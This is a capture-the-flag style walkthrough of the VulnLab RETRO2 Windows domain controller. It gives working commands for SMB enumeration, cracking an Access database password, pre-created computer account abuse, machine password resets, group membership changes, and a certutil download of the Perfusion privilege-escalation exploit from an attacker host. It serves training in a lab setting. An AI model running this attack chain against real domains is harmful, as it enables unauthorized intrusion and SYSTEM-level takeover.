Where Notes Work
RETRO2 – VULNLAB
This is the Write-up/Walkthrough of the RETRO2 Active Directory Machine from VULNLAB.
Note: IP is changed in some commands because stopping and starting the machine again gives new IP every time.
NMAP SCAN:
Nmap scan report for retro2.vl (10.10.92.93)
Host is up (0.14s latency).
Not shown: 983 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15F75) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15F75)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-22 14:29:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2024-12-22T14:31:17+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=BLN01.retro2.vl
| Not valid before: 2024-08-16T11:25:28
|_Not valid after: 2025-02-15T11:25:28
| rdp-ntlm-info:
| Target_Name: RETRO2
| NetBIOS_Domain_Name: RETRO2
| NetBIOS_Computer_Name: BLN01
| DNS_Domain_Name: retro2.vl
| DNS_Computer_Name: BLN01.retro2.vl
| DNS_Tree_Name: retro2.vl
| Product_Version: 6.1.7601
|_ System_Time: 2024-12-22T14:30:37+00:00
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49175/tcp open msrpc Microsoft Windows RPC
Analyzing the nmap report, reveals the domain RETRO2.VL. Add the domain with the IP in the /etc/hosts file.
IP retro2.vl
Looking for smb share found, there is db share allowed to read without credentials, which contain staff.accdb file. After downloading the file found that this is MS Access file which is password protected.
smbclient -L //retro2.vl
smbclient //retro2.vl/public
smb: \> ls
smb: \> cd db
smb: \db\> get staff.accdb
To gather the password of the staff.accdb file, i used office2john tool to gather the hash of the protected file and cracked the password of the file using john tool by providing the rockyou.txt wordlist.
After that opening the staff.accdb file in the MS Access and providing the password, it reveal the credentials of a domain user ldapreader, which indicate that it might being used for only query purpose using the LDAP service in the domain.
strLDAP = "LDAP://OU=staff,DC=retro2,DC=vl"
strUser = "retro2\ldapreader"
strPassword = "pp******"
After gathering the credential of the ldapreader user, i ran bloodhound-python to gather the data to analyze it in Bloodhound.
bloodhound-python -d retro2.vl --zip -c All -ns 10.10.77.116 -u ldapreader -p 'pp******'
Analyzing the data in the Bloodhound and looking for shortest path to Domain Admins, it reveals the following scenarios:
- “Domain Comptuters” have GenericWrite over ADMWS01$ computer
- ADMWS01$ computer have AddSelf rights over Services group
- Members of the Services group have CanRDP rights over the BLN01$ computer which is the domain controller.
The GenericWrite permission in Active Directory enables a user to modify all writable attributes of an object, except for properties requiring elevated permissions, such as resetting passwords.
- If you have GenericWrite over a user, you can modify the
servicePrincipalNames
attribute, enabling a targeted Kerberoasting attack. (Not easy to find the password of the machine account) - If you have GenericWrite over a group, you can add yourself or another principal you control to that group.
- If you have GenericWrite over a computer, you can modify the
msds-KeyCredentialLink
attribute. This allows an attacker to create “Shadow Credentials” for the object, enabling authentication as the principal using Kerberos PKINIT. (Not possible, requires Windows Server 2016)
To abuse GenericWrite, i created a new computer using impacket-addcomputer and tried targetedKerberoasting, pywhishker (require Windows Server 2016) nothing works.
As this machine name is RETRO2, if you have done RETRO machine (read blog), you remember that in that they are using pre-created computer accounts. After listing out the all computers in the domain, i tried login to the domain using netexec as computer name with password (same as the machine name) and i found one computer which shows STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT, which indicate that it is correct password for the computer account, but it is not used ever. You can read more about pre-created computer here.
netexec smb retro2.vl -u fs01$ fs01
After that, i changed the password of the FS01 domain computer using impacket-changepasswd utilizing rpc-samr protocol.
impacket-changepasswd retro2.vl/fs01\$:[email protected] -newpass Test@123 -protocol rpc-samr
After that, as i have GenericWrite over ADMWS01 computer, now i can change the password of the ADMWS01$ computer/machine account as FS01$. Utilizing net command in linux changed the password of the ADMWS01$ machine account and confirmed using netexec by authenticating to SMB server using ADMWS01$ account with newly changed password.
net rpc password 'admws01$' Test@1234 -U retro2.vl/'fs01$'%Test@123 -S 10.10.110.156
Next, looking at the Bloodhound, observe that ADMWS01$ machine have two rights (AddSelf & AddMember) over Services group.
Using AddSelf rights, ADMWS01$ machine can add itself to the Services group and using AddMember rights ADMWS01$ machine can add any user and comptuer to the Services group, using net command i added the ADMWS01$ machine and ldapreader user to Services group.
net rpc group addmem "services" admws01$ -U retro2.vl/'admws01$'%Test@1234 -S 10.10.110.156
net rpc group addmem "services" ldapreader -U retro2.vl/'admws01$'%Test@1234 -S 10.10.110.156
Confirm the changes using the following below command.
net rpc group members "services" -U \retro2.vl/'admws01$'%Test@1234 -S 10.10.110.156
Now, ldapreader user is part of Services group, as we have seen in the Bloodhound, members of the Services group CanRDP into the BLN01 computer, let’s connect to the RDP as ldapreader user.
xfreerdp /v:retro2.vl /p:pp****** /d:retro2.vl /tls-seclevel:0
After connecting to the RDP, i got the user.txt file as proof for the foothold, looking for root path, i checked the vulnlab wiki, they have added a blog link as a hint. After sometime i figured out that the OS version running on Domain Controller is way outdated (Windows Server 2008) and looking at the blog posts, i found a blog which was abusing Insecure Registry Permissions to execute program as high privilege user (NT Authority \SYSTEM).
To know more about the vulnerability, please refer to this blog. After that downloaded the exploit from GitHub and compile it using Visual Studio and transferred it to the Domain Controller(BLN01) using certutil or you can use another tools also from lolbas e.g. bitsadmin.
certutil -urlcache -f http://ATTACKERIP/Perfusion.exe Perfusion.exe
Just run the Perfusion.exe in the DC as ldapreader user, and you will get the new cmd process as nt authority privileges.
Perfusion.exe -c cmd -i
If you face any problems, let me know in the comment.